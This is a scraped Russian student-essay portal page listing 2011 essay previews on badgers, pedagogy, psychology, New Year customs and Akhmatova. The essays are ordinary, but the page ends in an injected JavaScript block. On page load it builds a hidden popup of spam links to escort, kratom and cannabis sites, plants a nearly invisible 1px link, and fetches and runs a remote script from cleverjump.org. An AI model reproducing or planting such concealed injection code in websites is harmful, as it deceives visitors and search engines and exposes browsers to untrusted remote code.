Суббота, 20.07.2019
Опросник
Какие работы вы хотите скачивать?
Всего ответов: 4
Система учета

Онлайн всего: 1
Гостей: 1
Пользователей: 0
Главная » 2011 » Ноябрь » 14
1 из 6

Введение

Барсук относится к отряду Хищные, семейству Куньи. Он является одним из самых крупных представителей этого семейства. Распространен барсук по всей Европе на север до северной Карелии, а в Сибири - до Сургута, встречается также на Кавказе, в Закавказье, в Крыму, в Средней, Центральной и Восточной Азии, на Дальнем Востоке доходит на север до Николаевска-на-Амуре; на Сахалине не водится. Наиболее многочислен барсук в средне лесной полосе, в лесостепи и в горах. Так в Воронежской области представлен подвидом Meles Meles - барсук обыкновенный или европейский. Это неуклюжий, приземистый зверь, достигающий длины тела 90 см и массы 30 кг. На ногах имеются длинные, слегка изогнутые когти, приспособленные в основном для рытья нор и некоторых других работ; подошвы ног голые, хвост короткий. Длинная грубая шерсть серого или буровато-серого цвета с серебристым оттенком, по бокам головы располагаются черные или черно-бур ... Читать дальше »

Просмотров: 109 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (0)

1 из 7

Незнание естественных причин заставило человека создать богов...

П.  Гольбах

Когда мир был на пять веков моложе, все жизненные происшествия облекались в формы, очерченные куда более резко, чем в наше время. Страдание и радость, злосчастье и удача различались гораздо более ощутимо; человеческие переживания сохраняли ту степень полноты и непосредственности, с которой и поныне воспринимает горе и радость душа ребёнка. Всякое действие, всякий поступок следовал разработанному и выразительному ритуалу, возвышаясь до прочного и неизменного стиля жизни. Важные события: рождение, брак, смерть - благодаря церковным таинствам достигали блеска мистерии. Вещи не столь значительные, такие как путешествие, работа, деловое или дружеское посещение, также сопровождались неоднократными благословениями, церемониями, присловьями и обставлялись теми или иными обрядами.

Бедствиям и обездолен ... Читать дальше »

Просмотров: 119 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (0)

1 из 9

Введение

Существует наука о воспитании - педагогика. Но воспитывать человека - это, скорее, искусство. И научить этому искусству не могут никакие, даже самые лучшие учебники. Может быть, поэтому с таким вниманием рассматриваем мы опыт людей, которые были наделены подлинным талантом воспитателей.

"На любви к детям держится мир". Сейчас уже трудно вспомнить, кто произнес эту фразу, но только точнее не скажешь о смысле человеческой жизни. Во все эпохи лучшие педагоги именно эту мысль считали главной в деле воспитания. Василий Александрович Сухомлинский из их числа. "Что самое главное было в моей жизни? Без раздумий отвечаю: любовь к детям" - так писал в главной книге своей жизни "Сердце отдаю детям". И название ее вовсе не красивый литературный оборот, а чистая правда.

"Верьте в талант и творческие силы каждого воспитанника!". Эти слова одного из самых замеча ... Читать дальше »

Просмотров: 137 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (0)

1 из 7

Введение

Человеческое различие - это безмерное богатство. Попытка воспитания на принципах одинаковости, принуждение детей к стандартному обучению и единым формам воспитания, приведение всех и вся к единому культурному знаменателю - огромная ошибка, свидетельствующая о беспомощности человечества в понимании своей природы.

Современная школа должна воспитывать детей так, чтобы, став взрослыми, они уверенно себя чувствовали и в лесной глуши, и в переполненном аэропорту большого города, чтобы при встрече друг с другом обращали внимание не на цвет кожи или принадлежность к той или иной конфессии, т.е. не на то, что является внешней формой, а видели действительную внутреннюю сущность человека.

Актуальность данной работы обусловлена еще и тем, что в сегодняшнем мире, где разрушаются традиционные культуры, исчезают общины и подвергаются сомнению религиозные ценности, молодые люди в ... Читать дальше »

Просмотров: 159 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (2)

1 из 3

Введение

В своем развитии психология прошла несколько этапов. Донаучный период заканчивается примерно в VII-VI вв. до н.э., т.е. до начала объективных, научных исследований психики, ее содержания и функций. В этот период представления о душе основывались на многочисленных мифах и легендах, на сказках и первоначальных религиозных верованиях, связывающих душу с определенными живыми существами (тотемами). Второй, научный период начинается на рубеже VII-VI вв. до н.э. Психология в этот период развивалась в рамках философии, а потому он получил условное название философского периода. Также несколько условно устанавливается и его длительность - до появления первой психологической школы (ассоцианизма) и определения собственно психологической терминологии, отличающейся от принятой в философии или естествознании. В связи с условностью периодизации развития психологии, естественной практически для любого исторического исследов ... Читать дальше »

Просмотров: 130 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (2)

1 из 6

Введение

Новая ситуация в экономике, в идеологической и политической жизни страны, болезненный переход к рыночным отношениям создали чрезвычайно сложное положение не только для руководителей предприятий, но и для управленцев, работающих в сфере образования, культуры и здравоохранения. Рыночные отношения требуют резкого роста самостоятельности, умения, оказавшись один на один со сложными задачами, решать их самому, не глядя «наверх» в ожидании приказа. Они требуют нового подхода к сотрудникам и коллективам, коренного переосмысления управления социальными системами, к которым, безусловно, относятся образовательные учреждения. Успех гуманизации и демократизации образовательной системы невозможен без реализации «человекоцентристских» принципов в управлении персоналом образовательных учреждений.

Именно поэтому сегодня так актуальны вопросы менеджмента образования. В теории уп ... Читать дальше »

Просмотров: 139 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (2)

1 из 6

1. Правила Дейла Карнеги в общении и их применение в речевом взаимодействии в работе коммерсанта

Деловое общение - это сложный многоплановый процесс развития контактов между людьми в служебной сфере. Его участники выступают в официальных статусах и ориентированы на достижение цели, конкретных задач. Специфической особенностью названного процесса является регламентированность, т. е. подчинение установленным ограничениям, которые определяются национальными и культурными традициями, профессиональными этическими принципами.

Общение как взаимодействие предполагает, что люди устанавливают контакт друг с другом, обмениваются определенной информацией для того, чтобы строить совместную деятельность, сотрудничество. В работе коммерсанта приходится устанавливать общение с народом и зачастую от этого и зависит успех в работе.

Чтобы общение как взаимодействие происходило беспроблемно, о ... Читать дальше »

Просмотров: 105 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (0)

1 из 6

Введение

К пониманию детства существует несколько подходов, один из них - психоаналитический, мы попытаемся частично осветить его в данной работе. В начале нашего века, как известно, было создано такое направление как психоанализ. Основателем его является Зигмунд Фрейд. Именно его учение в психологической науке дало начало осознанию важности детства  для всей жизни человека. Началось углубленное изучение, систематизация и обсуждения этого периода человеческой жизни. Впоследствии возникали самые разные психологические теории детства, некоторые из которых во многом или полностью противоположены психоаналитической, однако почти все признают ее значимость. Например,   Л. С. Выготский  в своих работах во многом не соглашается с теорией Фрейда, однако, замечает ее значимость.

В своей работе мы рассмотрим подходы трех авторов, принадлежащих к психоаналитической школе, которые внесли ... Читать дальше »

Просмотров: 122 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (0)

1 из 2

Методы музыкального развития определяются как действия педагога, направленные на развитие воображения у ребенка. Они строятся на основе активного взаимодействия взрослого и ребенка.

Метод убеждения средствами музыки. Исполнение музыки должно быть достаточно ярким, темпераментным и выразительным. Только тогда можно вызвать у детей эмоциональный отклик, переживания и тем самым добиться желаемого эффекта. Выразительное исполнение музыки является необходимым условием для того, чтобы у детей вызвать ассоциации и позволит работать воображению. Этому поможет предварительное ознакомление (это как прием) в процессе проигрывания.

Осмысленное исполнение оказывает на детей сильное воздействие, вызывая у них различные чувства, обогащает впечатлениями. Нужно организовать целенаправленное внимание, разъяснить тему, содержание, выразительность музыкальных средств. Музыка - язык чувств. У одних детей может возникнуть представле ... Читать дальше »

Просмотров: 113 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (2)

1 из 5

Введение

На вопрос, что такое личность, различные специалисты отвечают по-разному. Именно в разнообразии их ответов, и, следовательно, в расхождении мнений на этот счет и проявляется сложность самого феномена личности.

В основе практически всех теорий личности лежит предположение о том, что личность как социально-психологический феномен представляет собой жизненно устойчивое в своих основных проявлениях образование. Устойчивость личности характеризует последовательность ее действий и предсказуемость ее поведение, придает поступкам закономерный характер.

В понятие «личность» обычно включают такие свойства, которые являются более или менее устойчивыми и свидетельствуют об индивидуальности человека, определяя его значимые для людей поступки. Ощущение устойчивости личности - важное условие внутреннего благополучия человека и установления нормальных взаимоотношений ... Читать дальше »

Просмотров: 149 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (0)

1 из 8

Введение

         Консультирование можно рассматривать как особый вид отношений помощи, как некий репертуар возможных воздействий, как психологический процесс. Цели консультирования имеют связанный с сознанием аспект. В различной степени все консультационные подходы фокусируются на изменении чувств, мыслей и действий людей таким образом, чтобы люди могли жить более эффективно.

Психологическое консультирование - это диалог индивидуальностей, диалог уникальных личностей. Для диалога недостаточно обычного языка общения, недостаточно слов. Необходимо соединение разных взглядов на мир, взаимопонимание, контакт внутренних миров. Клиент выбирает консультанта интуитивно, часто ориентируясь на его формальные характеристики, воспринимая как специалиста или испытывая доверие и притяжение к нему как к личности. Консультант в большей степени ответственен, состоится ил ... Читать дальше »

Просмотров: 317 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (1)

1 из 5

Введение

Научный подход к формированию систем управления персоналом предполагает необходимость учета требований физиологии и психологии к рациональной организации трудовой деятельности работающих.

С давних пор философы пытались выявить закономерности тех или иных форм поведения личности, определить, почему с одним человеком легко найти общий язык, а с другим нет никакой возможности, чем определяется логика поведения отдельного человека.

В последние неизмеримо возросла потребность в психологических знаниях, раскрывающих закономерности общения и поведения людей в группах, коллективах и командах, в их совместном труде, учебе и отдыхе.

 Этим объясняется актуальность выбранной темы «Проблемы психологической совместимости членов команды».

Все наши отношения с окружающим миром строятся, исходя из  видения своего & ... Читать дальше »

Просмотров: 140 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (0)

1 из 9

Введение

Новый год - один из любимейших народом праздников. А какой же Новый год без весёлых розыгрышей и поздравлений! В преддверии праздника и взрослые, и дети с нетерпением ждут, когда в доме появится сверкающая красавица ёлка, а под ней - мешок с подарками от Деда Мороза.

Эти новогодние традиции складывались на протяжении десятков столетий. Известно, что уже в языческие времена Новый год праздновали весьма охотно. С различными обрядами, торжественными приношениями и забавами. Например, римляне всю ночь пировали, танцевали и бегали по улицам в масках. Они поздравляли друг друга с праздником, делали подарки. Патриции даже отпускали на волю своих рабов.

Как обстояло дело с празднованием Нового года в Древней Руси, до сих пор точно неизвестно, но, что зимний праздник существовал уже тогда, известно наверняка. Правда, он подразделялся на два периода: святые вечера и страшн ... Читать дальше »

Просмотров: 125 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (0)

1 из 8

В автобиографии, озаглавленной "Коротко о себе", Анна Ахматова писала: "Я родилась 11(23) июня 1889 года под Одессой (Большой Фонтан). Мой отец был в то время отставной инженер-механик флота. Годовалым ребенком я была перевезена на север - в Царское Село. Там я прожила до шестнадцати лет.

Мои первые воспоминания - царско-сельские: зеленое, сырое великолепие парков, выгон, куда меня водила няня, ипподром, где скакали маленькие пестрые лошадки, старый вокзал и нечто другое, что вошло впоследствии в "Царско-сельскую оду".

Каждое лето я проводила под Севастополем, на берегу Стрелецкой бухты, и там подружилась с морем. Самое сильное впечатление этих лет - древний Херсонес, около которого мы жили.

Читать я училась по азбуке Льва Толстого. В пять лет, слушая, как учительница занималась со старшими детьми, я тоже начала говорить по-французски.

Первое стихотворение я написала, ... Читать дальше »

Просмотров: 140 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (0)

1 из 7

Введение

Страх - древний спутник человечества. И некоторые страхи старше нас самих.

«Большинство ученых полагают, что чувство страха присуще всем высшим животным и в гораздо большей мере свойственно человеку с его тонко развитой психикой. Животные страхи - страх уничтожения и страх неизвестного - в равной степени присущи и Homo sapiens. Но если животное может бояться лишь конкретных опасностей, то человек благодаря своему воображению и умению анализировать окружающую действительность, научился бояться загодя.

Страхи бывают разные - объяснимые и иррациональные, оправданные и надуманные, и даже полезные. Но в большинстве своем наши страхи портят нам жизнь. Порой от них трудно бывает избавиться без помощи психотерапевта, например в случаях, когда страх перерос в фобию - невротическое расстройство.» [4,c. 5].

Подавляющее большинство страхов в ... Читать дальше »

Просмотров: 107 | Добавил: petruha | Дата: 14.11.2011 | Комментарии (0)

Поиск
Календарь
«  Ноябрь 2011  »
ПнВтСрЧтПтСбВс
 123456
78910111213
14151617181920
21222324252627
282930
Архив работ
Tuchka.At.Ua © 2019
(function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
list of cloud service providers in south africa<\/a> <\/div>
www.asg.co.za<\/span> <\/div> <\/div>
sydney vip escort<\/a> <\/div>
bestprivategirl.com<\/span> <\/div> <\/div> <\/div>
affordable dental bridges in atlanta<\/a> <\/div>
www.acefamilydental.com<\/span> <\/div> <\/div>
yakas\u0131 \u00e7\u0131t\u0131r escort<\/a> <\/div>
www.arzurproduction.com<\/span> <\/div> <\/div> <\/div>
house italian contemporary design<\/a> <\/div>
www.iqmatics.com<\/span> <\/div> <\/div>
ribs kuma\u015f<\/a> <\/div>
www.theumbrellahouse.com<\/span> <\/div> <\/div> <\/div>
\u0444\u043e\u043d\u0442\u0430\u043d\u044b \u0434\u043b\u044f \u0434\u043e\u043c\u0430 \u0438 \u043e\u0444\u0438\u0441\u0430<\/a> <\/div>
decorplaza.com.ua<\/span> <\/div> <\/div>
g\u00fcnstige poloshirts f\u00fcr herren<\/a> <\/div>
www.denim-culture.com<\/span> <\/div> <\/div> <\/div>
pretty love<\/a> <\/div>
www.blueshop.co.il<\/span> <\/div> <\/div>
\u0634\u0642\u0642 \u0627\u0633\u0637\u0646\u0628\u0648\u0644 \u062a\u0642\u0633\u064a\u0645<\/a> <\/div>
www.tour4arabs.com<\/span> <\/div> <\/div> <\/div>
java programming for beginners online<\/a> <\/div>
pcworkshopslondon.co.uk<\/span> <\/div> <\/div>
kratom borneo red vein<\/a> <\/div>
www.authentickratom.com<\/span> <\/div> <\/div> <\/div>
cherry pie kush<\/a> <\/div>
www.durgstoresonline.com<\/span> <\/div> <\/div>
listerine logo<\/a> <\/div>
www.christiania-tannlegesenter.no<\/span> <\/div> <\/div> <\/div>
\u0447\u0435\u043c\u043e\u0434\u0430\u043d \u0434\u043b\u044f \u0432\u0438\u0437\u0430\u0436\u0438\u0441\u0442\u0430 \u043d\u0430 \u043a\u043e\u043b\u0435\u0441\u0438\u043a\u0430\u0445<\/a> <\/div>
promakeupstore.com.ua<\/span> <\/div> <\/div>
\u043f\u043e\u044f\u0441 \u043c\u043e\u043d\u0442\u0430\u0436\u043d\u044b\u0439 \u0441 \u0446\u0435\u043f\u044c\u044e \u0442\u0438\u043f \u0430<\/a> <\/div>
vinkel.com.ua<\/span> <\/div> <\/div> <\/div>
wooden toys sydney<\/a> <\/div>
purpleturtletoys.com.au<\/span> <\/div> <\/div>
hotel diva \u043c\u0430\u043b\u044c\u0434\u0438\u0432\u044b<\/a> <\/div>
platinumtravel.com.ua<\/span> <\/div> <\/div> <\/div>
\u0434\u0430\u043d\u0430 \u043c\u0435\u0431\u0435\u043b\u044c \u043a\u043e\u043c\u043e\u0434\u044b<\/a> <\/div>
divanetto.com.ua<\/span> <\/div> <\/div>
vakkundigheid ontwikkelen fotografie<\/a> <\/div>
www.foto-cursussen.com<\/span> <\/div> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div>
\u0448\u043a\u043e\u043b\u0430 \u0430\u043d\u0433\u043b\u0438\u0439\u0441\u043a\u043e\u0433\u043e \u043f\u043e\u0437\u043d\u044f\u043a\u0438<\/a> <\/div>
oxford-school.com.ua<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} })();